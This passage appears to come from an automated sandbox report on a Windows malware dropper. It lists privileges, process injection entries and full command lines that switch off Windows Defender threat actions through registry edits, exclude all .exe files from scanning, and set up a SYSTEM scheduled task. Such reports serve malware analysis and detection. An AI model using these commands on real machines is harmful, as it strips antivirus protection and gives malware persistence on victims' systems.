Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4472 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe
PID 4472 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe
PID 4472 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe
PID 3564 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe
PID 3564 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe
PID 3564 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe
PID 780 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 780 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 780 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2468 wrote to memory of 3468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3468 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 4428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4428 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4428 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4428 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2468 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3152 wrote to memory of 2236 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 2236 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 2236 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2236 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2236 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2468 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2420 wrote to memory of 3504 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2420 wrote to memory of 3504 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2420 wrote to memory of 3504 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3504 wrote to memory of 3796 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3504 wrote to memory of 3796 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3504 wrote to memory of 3796 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2468 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4984 wrote to memory of 3988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 3988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4984 wrote to memory of 3988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3988 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3988 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3988 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2468 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2468 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3804 wrote to memory of 3076 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3076 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3076 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3076 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 780 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 780 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 780 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4504 wrote to memory of 1056 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 1056 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 1056 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4904 wrote to memory of 4380 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe

"C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe"

C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe

.\Install.exe /MQgEdidHb "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqHlMUmkmlcBkJQYdf" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe\" Dh /XyedidrVrX 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqHlMUmkmlcBkJQYdf"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqHlMUmkmlcBkJQYdf

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqHlMUmkmlcBkJQYdf

C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe Dh /XyedidrVrX 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

